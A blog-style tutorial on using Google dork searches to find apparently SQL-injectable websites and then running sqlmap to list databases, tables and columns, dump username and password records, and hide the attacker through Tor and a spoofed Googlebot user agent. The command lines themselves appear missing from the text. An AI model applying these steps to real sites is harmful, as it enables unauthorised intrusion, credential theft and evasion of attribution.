SQL Injection – Sqlmap and Google Dork

Google Dorking (or Google Hacking) is a way to find vulnerable websites and security holes in a website, searching on Google engine. Many websites expose sensitive data to the Internet. And many of them are really vulnerable to SQL Injection.

Sqlmap is an open source tool used for penetration testing. And for a lot of blackhat reasons. This software is highly sophisticated, so use it wisely (and only on your own server, or on others website, with their permission).

There are many operators that can be used in order to search vulnerable websites on Google. These are some examples:

  • intitle: the result will be pages that have the word in their title
  • inurl: the result will be pages that have the word in their url
  • filetype: the result will be pages that are specific file types
  • intext: the result will be pages that contain those words in their content
  • site: the result is limited to a specific site only

Search for vulnerable website

If you type on Google “inurl:item_id=”, you will get a lot of results. There is a great chance that these URLs have injectable parameters. But you have to test it before you try to exploit the vulnerability.

Test an URL for vulnerabilities

Now you have an URL that have GET parameters in it. You can test the SQL injection, appending a single quote at the parameter value. For example, if the initial URL is http://www.distro-zone.com/articles/?item_id=5 and append a single quote to the parameter, you will have http://www.distro-zone.com/articles/?item_id=5' .

Access this new URL. If it throws a strange error, you have found a vulnerable website.

Use Sqlmap on a vulnerable URL

Download the Sqlmap from sqlmap.org. This software is able to detect the database engine, dump tables entirely and many other sophisticated commands. It uses Python in order to run. If you have Kali Linux, sqlmap  is already installed.

First of all, you need to see what management system (database engine) is used. List DBMS databases:

Here -u is the target URL and –dbs is DBMS databases. If all works well, you should see used database. Now you have to run again the command with known database.

Here -D is the database argument and –tables show all tables in chosen database. After this run, you will see all the tables in the this database. Choose a table and see the columns:

The result should be all the columns in this table. If you see something interesting, like id, username, password, you can get the records by dumping.

and

Anyway, most probably, the password will be hashed. But if you are lucky and the password can be decrypted, you can try with some tools.

This is a pretty basic example of sqlmap . This tool can do a lot more. And if you increase the level and the risk with --level=5  and --risk=3 , it goes deeper than that.

Moreover, you can make this process almost untraceable, using tor  (need tor installed) and Google User Agent. If you add  --tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" , you are untraceable (more or less).

Last but not least, do not try this with bad intentions. sqlmap  says:

Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

Leave a Reply

Your email address will not be published. Required fields are marked *